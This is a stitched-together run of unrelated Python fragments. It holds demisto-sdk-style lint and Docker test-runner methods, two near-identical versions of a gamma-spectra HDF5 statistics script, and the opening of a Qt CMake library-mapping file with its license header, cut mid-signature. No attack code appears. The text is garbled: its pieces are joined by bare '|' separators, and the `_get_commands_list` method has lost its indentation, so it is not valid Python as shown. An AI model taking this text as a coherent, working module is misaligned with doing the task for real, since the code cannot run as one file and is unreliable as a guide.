        lint_files(List[Path]): files to lint

    Returns:
        int: 0 on success else 1
        str: flake8 errors
    """
    log_prompt = f"{self._pack_name} - Flake8"
    logger.info(f"{log_prompt} - Start")
    command = build_flake8_command(lint_files, py_num)
    stdout, stderr, exit_code = run_command_os(command=command, cwd=self._content_repo)
    logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
    logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
    logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
    if not (stderr or exit_code):
        logger.info(f"{log_prompt} - Successfully finished")
        return SUCCESS, ""
    logger.info(f"{log_prompt}- Finished errors found")
    # Prefer stderr (tool failure) over stdout (lint findings) as the report.
    return FAIL, stderr if stderr else stdout
def _run_xsoar_linter(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
    """ Runs the XSOAR linter (a pylint plugin) in pack dir

    Args:
        py_num(float): The python version in use
        lint_files(List[Path]): file to perform lint

    Returns:
        int: 0 on successful else 1, errors
        str: Xsoar linter errors
    """
    status = SUCCESS
    # pylint exit-code bit signalling error-level messages.
    FAIL_PYLINT = 0b10
    with pylint_plugin(self._pack_abs_dir):
        log_prompt = f"{self._pack_name} - XSOAR Linter"
        logger.info(f"{log_prompt} - Start")
        myenv = os.environ.copy()
        # Make the pack importable by the linter subprocess.
        if myenv.get('PYTHONPATH'):
            myenv['PYTHONPATH'] += ':' + str(self._pack_abs_dir)
        else:
            myenv['PYTHONPATH'] = str(self._pack_abs_dir)
        if self._facts['is_long_running']:
            myenv['LONGRUNNING'] = 'True'
        if py_num < 3:
            myenv['PY2'] = 'True'
        myenv['is_script'] = str(self._facts['is_script'])
        # as the Xsoar checker is a pylint plugin and runs as part of pylint code, we can not pass args to it.
        # as a result we use the env vars as a gateway.
        myenv['commands'] = ','.join([str(elem) for elem in self._facts['commands']]) \
            if self._facts['commands'] else ''
        stdout, stderr, exit_code = run_command_os(
            command=build_xsoar_linter_command(lint_files, py_num, self._facts.get('support_level', 'base')),
            cwd=self._pack_abs_dir, env=myenv)
        if exit_code & FAIL_PYLINT:
            logger.info(f"{log_prompt}- Finished errors found")
            status = FAIL
        if exit_code & WARNING:
            logger.info(f"{log_prompt} - Finished warnings found")
            if not status:
                status = WARNING
        # if pylint did not run and a failure exit code has been returned from run command
        elif exit_code & FAIL:
            status = FAIL
            # for contrib prs which are not merged from master and do not have pylint in dev-requirements-py2.
            if os.environ.get('CI'):
                stdout = "Xsoar linter could not run, Please merge from master"
            else:
                stdout = "Xsoar linter could not run, please make sure you have" \
                         " the necessary Pylint version for both py2 and py3"
            logger.info(f"{log_prompt}- Finished errors found")
        logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
        logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
        logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
        if not exit_code:
            logger.info(f"{log_prompt} - Successfully finished")
        return status, stdout
def _run_bandit(self, lint_files: List[Path]) -> Tuple[int, str]:
    """ Run bandit in pack dir

    Args:
        lint_files(List[Path]): files to lint

    Returns:
        int: 0 on successful else 1, errors
        str: Bandit errors
    """
    log_prompt = f"{self._pack_name} - Bandit"
    logger.info(f"{log_prompt} - Start")
    stdout, stderr, exit_code = run_command_os(command=build_bandit_command(lint_files),
                                               cwd=self._pack_abs_dir)
    logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
    logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
    logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
    if stderr or exit_code:
        # Fix: message previously read "- Finished Finished errors found".
        logger.info(f"{log_prompt} - Finished errors found")
        # Prefer stderr (tool failure) over stdout (lint findings) as the report.
        if stderr:
            return FAIL, stderr
        return FAIL, stdout
    logger.info(f"{log_prompt} - Successfully finished")
    return SUCCESS, ""
def _run_mypy(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
    """ Run mypy in pack dir

    Args:
        py_num(float): The python version in use
        lint_files(List[Path]): files to lint

    Returns:
        int: 0 on successful else 1, errors
        str: Mypy errors
    """
    log_prompt = f"{self._pack_name} - Mypy"
    logger.info(f"{log_prompt} - Start")
    # add_typing_module temporarily makes a typing module available next to the files.
    with add_typing_module(lint_files=lint_files, python_version=py_num):
        stdout, stderr, exit_code = run_command_os(command=build_mypy_command(files=lint_files, version=py_num),
                                                   cwd=self._pack_abs_dir)
        logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
        logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
        logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
        if stderr or exit_code:
            # Fix: message previously read "- Finished Finished errors found".
            logger.info(f"{log_prompt} - Finished errors found")
            # Prefer stderr (tool failure) over stdout (lint findings) as the report.
            if stderr:
                return FAIL, stderr
            return FAIL, stdout
    logger.info(f"{log_prompt} - Successfully finished")
    return SUCCESS, ""
def _run_vulture(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
    """ Run vulture (dead-code detection) in pack dir

    Args:
        py_num(float): The python version in use
        lint_files(List[Path]): files to lint

    Returns:
        int: 0 on successful else 1, errors
        str: Vulture errors
    """
    log_prompt = f"{self._pack_name} - Vulture"
    logger.info(f"{log_prompt} - Start")
    stdout, stderr, exit_code = run_command_os(command=build_vulture_command(files=lint_files,
                                                                            pack_path=self._pack_abs_dir,
                                                                            py_num=py_num),
                                               cwd=self._pack_abs_dir)
    logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
    logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
    logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
    if stderr or exit_code:
        # Fix: message previously read "- Finished Finished errors found".
        logger.info(f"{log_prompt} - Finished errors found")
        # Prefer stderr (tool failure) over stdout (lint findings) as the report.
        if stderr:
            return FAIL, stderr
        return FAIL, stdout
    logger.info(f"{log_prompt} - Successfully finished")
    return SUCCESS, ""
def _run_lint_on_docker_image(self, no_pylint: bool, no_test: bool, no_pwsh_analyze: bool, no_pwsh_test: bool,
                              keep_container: bool, test_xml: str):
    """ Run lint check on docker image

    Args:
        no_pylint(bool): Whether to skip pylint
        no_test(bool): Whether to skip pytest
        no_pwsh_analyze(bool): Whether to skip powershell code analyzing
        no_pwsh_test(bool): whether to skip powershell tests
        keep_container(bool): Whether to keep the test container
        test_xml(str): Path for saving pytest xml results
    """
    for image in self._facts["images"]:
        # Docker image status - visualize
        status = {
            "image": image[0],
            "image_errors": "",
            "pylint_errors": "",
            "pytest_errors": "",
            "pytest_json": {},
            "pwsh_analyze_errors": "",
            "pwsh_test_errors": ""
        }
        # Creating image if pylint specified or found tests and tests specified
        # (up to two attempts).
        image_id = ""
        errors = ""
        for trial in range(2):
            image_id, errors = self._docker_image_create(docker_base_image=image)
            if not errors:
                break
        if image_id and not errors:
            # Set image creation status
            for check in ["pylint", "pytest", "pwsh_analyze", "pwsh_test"]:
                exit_code = SUCCESS
                output = ""
                for trial in range(2):
                    if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
                        # Perform pylint
                        if not no_pylint and check == "pylint" and self._facts["lint_files"]:
                            exit_code, output = self._docker_run_pylint(test_image=image_id,
                                                                       keep_container=keep_container)
                        # Perform pytest
                        elif not no_test and self._facts["test"] and check == "pytest":
                            exit_code, output, test_json = self._docker_run_pytest(test_image=image_id,
                                                                                  keep_container=keep_container,
                                                                                  test_xml=test_xml)
                            status["pytest_json"] = test_json
                    elif self._pkg_lint_status["pack_type"] == TYPE_PWSH:
                        # Perform powershell analyze
                        if not no_pwsh_analyze and check == "pwsh_analyze" and self._facts["lint_files"]:
                            exit_code, output = self._docker_run_pwsh_analyze(test_image=image_id,
                                                                             keep_container=keep_container)
                        # Perform powershell test
                        elif not no_pwsh_test and check == "pwsh_test":
                            exit_code, output = self._docker_run_pwsh_test(test_image=image_id,
                                                                          keep_container=keep_container)
                    # If a lint check failed for a reason related to the environment (RERUN)
                    # it runs a second time; failing the second time counts as a failure.
                    if (exit_code == RERUN and trial == 1) or exit_code == FAIL or exit_code == SUCCESS:
                        if exit_code in [RERUN, FAIL]:
                            self._pkg_lint_status["exit_code"] |= EXIT_CODES[check]
                            status[f"{check}_errors"] = output
                        break
        else:
            status["image_errors"] = str(errors)
            # NOTE(review): `+=` is used here while the per-check path uses `|=`;
            # repeated image failures could double-add this bit - confirm intent.
            self._pkg_lint_status["exit_code"] += EXIT_CODES["image"]
        # Add image status to images
        self._pkg_lint_status["images"].append(status)
        try:
            self._docker_client.images.remove(image_id)
        except (docker.errors.ImageNotFound, docker.errors.APIError):
            pass
def _docker_login(self) -> bool:
    """ Login to docker-hub using environment variables:
        1. DOCKERHUB_USER - User for docker hub.
        2. DOCKERHUB_PASSWORD - Password for docker-hub.
    Used in Circle-CI for pushing into repo devtestdemisto

    Returns:
        bool: True if logged in successfully.
    """
    try:
        self._docker_client.login(username=os.getenv('DOCKERHUB_USER'),
                                  password=os.getenv('DOCKERHUB_PASSWORD'),
                                  registry="https://index.docker.io/v1")
        return self._docker_client.ping()
    except docker.errors.APIError:
        # Missing/invalid credentials or unreachable daemon.
        return False
def _docker_image_create(self, docker_base_image: List[Any]) -> Tuple[str, str]:
    """ Create docker image:
        1. Installing 'build base' if required in alpine images version - https://wiki.alpinelinux.org/wiki/GCC
        2. Installing pypi packs - if only pylint required - only pylint installed otherwise all pytest and pylint
           installed, packages which being install can be found in path demisto_sdk/commands/lint/dev_envs
        3. The docker image build done by Dockerfile template located in
           demisto_sdk/commands/lint/templates/dockerfile.jinja2

    Args:
        docker_base_image(list): docker image to use as base for installing dev deps and python version.

    Returns:
        str, str. image name to use and errors string.
    """
    log_prompt = f"{self._pack_name} - Image create"
    test_image_id = ""
    # Pick the requirements matching the image's python major version.
    requirements = []
    if 2 < docker_base_image[1] < 3:
        requirements = self._req_2
    elif docker_base_image[1] > 3:
        requirements = self._req_3
    # Using DockerFile template
    file_loader = FileSystemLoader(Path(__file__).parent / 'templates')
    env = Environment(loader=file_loader, lstrip_blocks=True, trim_blocks=True, autoescape=True)
    template = env.get_template('dockerfile.jinja2')
    try:
        dockerfile = template.render(image=docker_base_image[0],
                                     pypi_packs=requirements + self._facts["additional_requirements"],
                                     pack_type=self._pkg_lint_status["pack_type"],
                                     copy_pack=False)
    except exceptions.TemplateError as e:
        # Fix: `e.message` is an attribute, not a callable - `e.message()` raised
        # a TypeError here and masked the original template error.
        logger.debug(f"{log_prompt} - Error when build image - {e}")
        return test_image_id, str(e)
    # Trying to pull image based on dockerfile hash, will check if something changed
    errors = ""
    test_image_name = f'devtest{docker_base_image[0]}-{hashlib.md5(dockerfile.encode("utf-8")).hexdigest()}'
    test_image = None
    try:
        logger.info(f"{log_prompt} - Trying to pull existing image {test_image_name}")
        test_image = self._docker_client.images.pull(test_image_name)
    except (docker.errors.APIError, docker.errors.ImageNotFound):
        logger.info(f"{log_prompt} - Unable to find image {test_image_name}")
    # Creating new image if existing image isn't found
    if not test_image:
        logger.info(
            f"{log_prompt} - Creating image based on {docker_base_image[0]} - Could take 2-3 minutes at first "
            f"time")
        try:
            with io.BytesIO() as f:
                f.write(dockerfile.encode('utf-8'))
                f.seek(0)
                self._docker_client.images.build(fileobj=f,
                                                 tag=test_image_name,
                                                 forcerm=True)
                if self._docker_hub_login:
                    for trial in range(2):
                        try:
                            self._docker_client.images.push(test_image_name)
                            logger.info(f"{log_prompt} - Image {test_image_name} pushed to repository")
                            break
                        except (requests.exceptions.ConnectionError, urllib3.exceptions.ReadTimeoutError):
                            logger.info(f"{log_prompt} - Unable to push image {test_image_name} to repository")
        except (docker.errors.BuildError, docker.errors.APIError, Exception) as e:
            logger.critical(f"{log_prompt} - Build errors occurred {e}")
            errors = str(e)
    else:
        logger.info(f"{log_prompt} - Found existing image {test_image_name}")
    # Second stage: copy the pack dir into the (pulled or built) dev image.
    dockerfile_path = Path(self._pack_abs_dir / ".Dockerfile")
    dockerfile = template.render(image=test_image_name,
                                 copy_pack=True)
    with open(file=dockerfile_path, mode="+x") as file:
        file.write(str(dockerfile))
    # we only do retries in CI env where docker build is sometimes flaky
    build_tries = int(os.getenv('DEMISTO_SDK_DOCKER_BUILD_TRIES', 3)) if os.getenv('CI') else 1
    for trial in range(build_tries):
        try:
            logger.info(f"{log_prompt} - Copy pack dir to image {test_image_name}")
            docker_image_final = self._docker_client.images.build(path=str(dockerfile_path.parent),
                                                                  dockerfile=dockerfile_path.stem,
                                                                  forcerm=True)
            test_image_name = docker_image_final[0].short_id
            break
        except Exception as e:
            logger.exception(f"{log_prompt} - errors occurred when building image in dir {e}")
            # Fix: `trial` ranges over [0, build_tries), so the previous
            # `trial >= build_tries` check was never true and the final build
            # failure was never recorded in `errors`.
            if trial >= build_tries - 1:
                errors = str(e)
            else:
                logger.info(f"{log_prompt} - sleeping 2 seconds and will retry build after")
                time.sleep(2)
    if dockerfile_path.exists():
        dockerfile_path.unlink()
    if test_image_id:
        logger.info(f"{log_prompt} - Image {test_image_id} created successfully")
    return test_image_name, errors
def _docker_remove_container(self, container_name: str):
    """ Force-remove a container by name, ignoring the case where it does not exist. """
    try:
        self._docker_client.containers.get(container_name).remove(force=True)
    except docker.errors.NotFound:
        pass
    except requests.exceptions.ChunkedEncodingError as err:
        # see: https://github.com/docker/docker-py/issues/2696#issuecomment-721322548
        if platform.system() != 'Darwin' or 'Connection broken' not in str(err):
            raise
def _docker_run_pylint(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
    """ Run Pylint in created test image

    Args:
        test_image(str): test image id/name
        keep_container(bool): True if to keep container after execution finished

    Returns:
        int: 0 on successful, errors 1, need to retry 2
        str: Container log
    """
    log_prompt = f'{self._pack_name} - Pylint - Image {test_image}'
    logger.info(f"{log_prompt} - Start")
    container_name = f"{self._pack_name}-pylint"
    # Remove any container left over from a previous (interrupted) run.
    self._docker_remove_container(container_name)
    # Run container detached so its log stream can be consumed while it runs.
    exit_code = SUCCESS
    output = ""
    try:
        container_obj: docker.models.containers.Container = self._docker_client.containers.run(
            name=container_name,
            image=test_image,
            command=[
                build_pylint_command(
                    self._facts["lint_files"], docker_version=self._facts.get('python_version'))
            ],
            user=f"{os.getuid()}:4000",
            detach=True,
            environment=self._facts["env_vars"]
        )
        stream_docker_container_output(container_obj.logs(stream=True))
        # wait for container to finish
        container_status = container_obj.wait(condition="exited")
        # Get container exit code
        container_exit_code = container_status.get("StatusCode")
        # Getting container logs
        container_log = container_obj.logs().decode("utf-8")
        logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
        # Map pylint's bitwise exit codes onto the lint statuses.
        if container_exit_code in [1, 2]:
            # 1-fatal message issued
            # 2-Error message issued
            exit_code = FAIL
            output = container_log
            logger.info(f"{log_prompt} - Finished errors found")
        elif container_exit_code in [4, 8, 16]:
            # 4-Warning message issued
            # 8-refactor message issued
            # 16-convention message issued
            logger.info(f"{log_prompt} - Successfully finished - warnings found")
            exit_code = SUCCESS
        elif container_exit_code == 32:
            # 32-usage error: environment problem, worth retrying
            logger.critical(f"{log_prompt} - Finished - Usage error")
            exit_code = RERUN
        else:
            logger.info(f"{log_prompt} - Successfully finished")
        # Keeping container if needed or remove it
        if keep_container:
            print(f"{log_prompt} - container name {container_name}")
        else:
            try:
                container_obj.remove(force=True)
            except docker.errors.NotFound as e:
                logger.critical(f"{log_prompt} - Unable to delete container - {e}")
    except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
        # Environment-level docker failure: signal the caller to retry (RERUN).
        logger.critical(f"{log_prompt} - Unable to run pylint - {e}")
        exit_code = RERUN
        output = str(e)
    return exit_code, output
def _docker_run_pytest(self, test_image: str, keep_container: bool, test_xml: str) -> Tuple[int, str, dict]:
    """ Run Pytest in created test image
    Args:
        test_image(str): Test image id/name
        keep_container(bool): True if to keep container after execution finished
        test_xml(str): Xml saving path
    Returns:
        int: 0 on successful, errors 1, need to retry 2
        str: Container output (only populated on interrupt/usage error)
        dict: Unit test json report
    """
    log_prompt = f'{self._pack_name} - Pytest - Image {test_image}'
    logger.info(f"{log_prompt} - Start")
    container_name = f"{self._pack_name}-pytest"
    # Check if previous run left container a live if it does, Remove it
    self._docker_remove_container(container_name)
    # Collect tests
    exit_code = SUCCESS
    output = ''
    test_json = {}
    try:
        # Running pytest container detached so logs can be streamed while it runs
        container_obj: docker.models.containers.Container = self._docker_client.containers.run(
            name=container_name,
            image=test_image,
            command=[build_pytest_command(test_xml=test_xml, json=True)],
            user=f"{os.getuid()}:4000",
            detach=True,
            environment=self._facts["env_vars"])
        stream_docker_container_output(container_obj.logs(stream=True))
        # Waiting for container to be finished
        container_status: dict = container_obj.wait(condition="exited")
        # Getting container exit code
        container_exit_code = container_status.get("StatusCode")
        logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
        if container_exit_code in [0, 1, 2, 5]:
            # 0-All tests passed
            # 1-Tests were collected and run but some of the tests failed
            # 2-Test execution was interrupted by the user
            # 5-No tests were collected
            if test_xml:
                test_data_xml = get_file_from_container(container_obj=container_obj,
                                                        container_path="/devwork/report_pytest.xml")
                # Fixed local name typo: xml_apth -> xml_path
                xml_path = Path(test_xml) / f'{self._pack_name}_pytest.xml'
                with open(file=xml_path, mode='bw') as f:
                    f.write(test_data_xml)  # type: ignore
            test_json = json.loads(get_file_from_container(container_obj=container_obj,
                                                           container_path="/devwork/report_pytest.json",
                                                           encoding="utf-8"))
            # Split multi-line tracebacks for readability. Guard with "or []":
            # .get("tests") returns None when the key is absent, and iterating
            # None would raise TypeError here.
            for test in test_json.get('report', {}).get("tests") or []:
                if test.get("call", {}).get("longrepr"):
                    test["call"]["longrepr"] = test["call"]["longrepr"].split('\n')
            if container_exit_code in [0, 5]:
                logger.info(f"{log_prompt} - Successfully finished")
                exit_code = SUCCESS
            elif container_exit_code in [2]:
                output = container_obj.logs().decode('utf-8')
                exit_code = FAIL
            else:
                logger.info(f"{log_prompt} - Finished errors found")
                exit_code = FAIL
        elif container_exit_code in [3, 4]:
            # 3-Internal error happened while executing tests
            # 4-pytest command line usage error
            logger.critical(f"{log_prompt} - Usage error")
            exit_code = RERUN
            output = container_obj.logs().decode('utf-8')
        # Remove container if not needed
        if keep_container:
            print(f"{log_prompt} - Container name {container_name}")
        else:
            try:
                container_obj.remove(force=True)
            except docker.errors.NotFound as e:
                logger.critical(f"{log_prompt} - Unable to remove container {e}")
    except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
        logger.critical(f"{log_prompt} - Unable to run pytest container {e}")
        exit_code = RERUN
    return exit_code, output, test_json
def _docker_run_pwsh_analyze(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
    """ Run Powershell code analyze in created test image
    Args:
        test_image(str): test image id/name
        keep_container(bool): True if to keep container after execution finished
    Returns:
        int: 0 on successful, errors 1, need to retry 2
        str: Container log
    """
    log_prompt = f'{self._pack_name} - Powershell analyze - Image {test_image}'
    logger.info(f"{log_prompt} - Start")
    container_name = f"{self._pack_name}-pwsh-analyze"
    # Check if previous run left container a live if it do, we remove it.
    # Consistency fix: use the shared helper like every other _docker_run_*
    # method instead of duplicating the get/remove/NotFound sequence inline.
    self._docker_remove_container(container_name)
    # Run container
    exit_code = SUCCESS
    output = ""
    try:
        container_obj: docker.models.containers.Container = self._docker_client.containers.run(
            name=container_name,
            image=test_image,
            command=build_pwsh_analyze_command(self._facts["lint_files"][0]),
            user=f"{os.getuid()}:4000",
            detach=True,
            environment=self._facts["env_vars"])
        stream_docker_container_output(container_obj.logs(stream=True))
        # wait for container to finish
        container_status = container_obj.wait(condition="exited")
        # Get container exit code
        container_exit_code = container_status.get("StatusCode")
        # Getting container logs
        container_log = container_obj.logs().decode("utf-8")
        logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
        if container_exit_code:
            # Any non-zero exit code means the analyzer reported problems
            logger.info(f"{log_prompt} - Finished errors found")
            output = container_log
            exit_code = FAIL
        else:
            logger.info(f"{log_prompt} - Successfully finished")
        # Keeping container if needed or remove it
        if keep_container:
            print(f"{log_prompt} - container name {container_name}")
        else:
            try:
                container_obj.remove(force=True)
            except docker.errors.NotFound as e:
                logger.critical(f"{log_prompt} - Unable to delete container - {e}")
    except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
        logger.critical(f"{log_prompt} - Unable to run powershell test - {e}")
        exit_code = RERUN
    return exit_code, output
def _update_support_level(self):
    """ Read the pack's metadata json and store its support level in self._facts.

    The pack dir is one level up when linting an integration directory and two
    levels up otherwise. A pack marked 'partner' that also carries a
    'Certification' field is promoted to 'certified partner'.
    """
    pack_dir = self._pack_abs_dir.parent if self._pack_abs_dir.parts[-1] == INTEGRATIONS_DIR else \
        self._pack_abs_dir.parent.parent
    # Use a context manager so the metadata file handle is always closed
    # (the previous bare .open() leaked the file descriptor).
    with (pack_dir / PACKS_PACK_META_FILE_NAME).open() as meta_file:
        pack_meta_content: Dict = json.load(meta_file)
    self._facts['support_level'] = pack_meta_content.get('support')
    if self._facts['support_level'] == 'partner' and pack_meta_content.get('Certification'):
        self._facts['support_level'] = 'certified partner'
def _docker_run_pwsh_test(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
    """ Execute the Powershell test suite inside the given test image.

    Args:
        test_image(str): test image id/name
        keep_container(bool): True if to keep container after execution finished

    Returns:
        int: 0 on successful, errors 1, need to retry 2
        str: Container log
    """
    log_prompt = f'{self._pack_name} - Powershell test - Image {test_image}'
    logger.info(f"{log_prompt} - Start")
    container_name = f"{self._pack_name}-pwsh-test"
    # Drop any stale container left behind by a previous interrupted run
    self._docker_remove_container(container_name)
    exit_code, output = SUCCESS, ""
    try:
        # Launch detached so logs can be streamed while the tests run
        container_obj: docker.models.containers.Container = self._docker_client.containers.run(
            name=container_name,
            image=test_image,
            command=build_pwsh_test_command(),
            user=f"{os.getuid()}:4000",
            detach=True,
            environment=self._facts["env_vars"])
        stream_docker_container_output(container_obj.logs(stream=True))
        # Block until the container exits, then read its status code and logs
        container_exit_code = container_obj.wait(condition="exited").get("StatusCode")
        container_log = container_obj.logs().decode("utf-8")
        logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
        if not container_exit_code:
            logger.info(f"{log_prompt} - Successfully finished")
        else:
            # Any non-zero exit code means the test run reported problems
            logger.info(f"{log_prompt} - Finished errors found")
            output = container_log
            exit_code = FAIL
        # Either keep the container for debugging or clean it up
        if not keep_container:
            try:
                container_obj.remove(force=True)
            except docker.errors.NotFound as e:
                logger.critical(f"{log_prompt} - Unable to delete container - {e}")
        else:
            print(f"{log_prompt} - container name {container_name}")
    except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
        logger.critical(f"{log_prompt} - Unable to run powershell test - {e}")
        exit_code = RERUN
    return exit_code, output
def _get_commands_list(self, script_obj: dict):
""" Get all commands from yml file of the pack
Args:
script_obj(dict): the script section of the yml file.
Returns:
list: list of all commands
"""
commands_list = []
try:
commands_obj = script_obj.get('commands', {})
for command in commands_obj:
commands_list.append(command.get('name', ''))
except Exception:
logger.debug("Failed getting the commands from the yml file")
return commands_list
|
import sys
import time
import h5py
import argparse
import numpy as np
from skimage.metrics import peak_signal_noise_ratio as psnr
from spectra_utils import split_radionuclide_name, plot_data
def load_data(datafile, det, show_data=False):
    """Read one detector group from an HDF5 file into an in-memory dict.

    Args:
        datafile: path of the HDF5 data file.
        det: name of the detector group inside the file.
        show_data: when True, plot the loaded dataset.

    Returns:
        dict with keys name, keV, spectrum, noisy_spectrum, noise,
        compton_scale and noise_scale, each fully materialized.
    """
    fields = ("name", "keV", "spectrum", "noisy_spectrum", "noise",
              "compton_scale", "noise_scale")
    with h5py.File(datafile, 'r') as h5f:
        group = h5f[det]
        # Clean and noisy spectra must pair up one-to-one
        assert group["spectrum"].shape == group["noisy_spectrum"].shape, \
            f'Mismatch between training examples and target examples'
        dataset = {field: group[field][()] for field in fields}
    if show_data:
        plot_data(dataset)
    return dataset
def dataset_stats(dataset, det):
    """Print shape/scale statistics and the PSNR range of a loaded dataset.

    Args:
        dataset: dict produced by load_data().
        det: detector name, used only to label the output.
    """
    print(f'Dataset {det}:')
    # Double quotes for the inner keys: reusing the outer quote character
    # inside an f-string is a SyntaxError on every Python before 3.12 (PEP 701).
    print(f'\tfeatures: {dataset["keV"].shape}')
    print(f'\tclean spectra: {dataset["spectrum"].shape}')
    print(f'\tnoisy spectra: {dataset["noisy_spectrum"].shape}')
    print(f'\tnoise: {dataset["noise"].shape}')
    print(f'\tmin Compton scale: {np.min(dataset["compton_scale"])}')
    print(f'\tmax Compton scale: {np.max(dataset["compton_scale"])}')
    print(f'\tmin Noise scale: {np.min(dataset["noise_scale"])}')
    print(f'\tmax Noise scale: {np.max(dataset["noise_scale"])}')
    noisy_spectra = dataset['noisy_spectrum']
    clean_spectra = dataset['spectrum']
    # Track the best/worst PSNR over all clean/noisy pairs
    min_psnr = 9999.0
    max_psnr = 0.0
    for clean, noisy in zip(clean_spectra, noisy_spectra):
        noisy_psnr = psnr(clean, noisy)
        min_psnr = min(min_psnr, noisy_psnr)
        max_psnr = max(max_psnr, noisy_psnr)
    print(f'\tmax PSNR {max_psnr:.2f} dB')
    print(f'\tmin PSNR {min_psnr:.2f} dB')
def main():
    """CLI entry point: load a spectra dataset and report its statistics."""
    start = time.time()
    parser = argparse.ArgumentParser()
    parser.add_argument("-df", "--datafile", help="data file containing templates", default="data/training.h5")
    parser.add_argument("-det", "--dettype", help="detector type", default="HPGe")
    parser.add_argument("-sf", "--showfigs", help="saves plots of data", default=False, action="store_true")
    arg = parser.parse_args()
    print(f'Loading data set from {arg.datafile}')
    dataset = load_data(arg.datafile, arg.dettype.upper(), show_data=arg.showfigs)
    # Double quotes inside the f-string: quote reuse is a pre-3.12 SyntaxError
    print(f'{len(dataset["name"])} examples in dataset.')
    dataset_stats(dataset, arg.dettype)
    print(f'\nScript completed in {time.time()-start:.2f} secs')
    return 0


if __name__ == '__main__':
    sys.exit(main())
| import sys
import time
import h5py
import argparse
import numpy as np
from skimage.metrics import peak_signal_noise_ratio as psnr
from spectra_utils import split_radionuclide_name, plot_data
def load_data(datafile, det, show_data=False):
    """Load a detector's spectra dataset from an HDF5 file.

    Args:
        datafile: path of the HDF5 data file.
        det: name of the detector group inside the file.
        show_data: when True, plot the loaded dataset.

    Returns:
        dict with keys name, keV, spectrum, noisy_spectrum, noise,
        compton_scale and noise_scale, each fully read into memory.
    """
    wanted = ("name", "keV", "spectrum", "noisy_spectrum", "noise",
              "compton_scale", "noise_scale")
    with h5py.File(datafile, 'r') as h5f:
        group = h5f[det]
        # Every clean spectrum must have a matching noisy counterpart
        assert group["spectrum"].shape == group["noisy_spectrum"].shape, \
            f'Mismatch between training examples and target examples'
        dataset = {key: group[key][()] for key in wanted}
    if show_data:
        plot_data(dataset)
    return dataset
def dataset_stats(dataset, det):
    """Print shape/scale statistics and the PSNR range of a loaded dataset.

    Args:
        dataset: dict produced by load_data().
        det: detector name, used only to label the output.
    """
    print(f'Dataset {det}:')
    print(f'\tfeatures: {dataset["keV"].shape}')
    print(f'\tclean spectra: {dataset["spectrum"].shape}')
    print(f'\tnoisy spectra: {dataset["noisy_spectrum"].shape}')
    print(f'\tnoise: {dataset["noise"].shape}')
    print(f'\tmin Compton scale: {np.min(dataset["compton_scale"])}')
    print(f'\tmax Compton scale: {np.max(dataset["compton_scale"])}')
    print(f'\tmin Noise scale: {np.min(dataset["noise_scale"])}')
    print(f'\tmax Noise scale: {np.max(dataset["noise_scale"])}')
    # Track the best/worst PSNR over all clean/noisy pairs
    min_psnr, max_psnr = 9999.0, 0.0
    for target, example in zip(dataset['spectrum'], dataset['noisy_spectrum']):
        score = psnr(target, example)
        min_psnr = min(min_psnr, score)
        max_psnr = max(max_psnr, score)
    print(f'\tmax PSNR {max_psnr:.2f} dB')
    print(f'\tmin PSNR {min_psnr:.2f} dB')
def main():
    """CLI entry point: load a spectra dataset and report its statistics."""
    start = time.time()
    # Argument order is preserved so --help output stays identical
    parser = argparse.ArgumentParser()
    parser.add_argument("-df", "--datafile", help="data file containing templates", default="data/training.h5")
    parser.add_argument("-det", "--dettype", help="detector type", default="HPGe")
    parser.add_argument("-sf", "--showfigs", help="saves plots of data", default=False, action="store_true")
    args = parser.parse_args()
    print(f'Loading data set from {args.datafile}')
    dataset = load_data(args.datafile, args.dettype.upper(), show_data=args.showfigs)
    print(f'{len(dataset["name"])} examples in dataset.')
    dataset_stats(dataset, args.dettype)
    print(f'\nScript completed in {time.time()-start:.2f} secs')
    return 0


if __name__ == '__main__':
    sys.exit(main())
|
#############################################################################
##
## Copyright (C) 2018 The Qt Company Ltd.
## Contact: https://www.qt.io/licensing/
##
## This file is part of the plugins of the Qt Toolkit.
##
## $QT_BEGIN_LICENSE:GPL-EXCEPT$
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms
## and conditions see https://www.qt.io/terms-conditions. For further
## information use the contact form at https://www.qt.io/contact-us.
##
## GNU General Public License Usage
## Alternatively, this file may be used under the terms of the GNU
## General Public License version 3 as published by the Free Software
## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
## included in the packaging of this file. Please review the following
## information to ensure the GNU General Public License requirements will
## be met: https://www.gnu.org/licenses/gpl-3.0.html.
##
## $QT_END_LICENSE$
##
#############################################################################
import re
import typing
class LibraryMapping:
    """Describes how a qmake library name maps to a CMake package and target."""

    def __init__(
        self,
        soName: str,
        packageName: typing.Optional[str],
        targetName: typing.Optional[str],
        *,
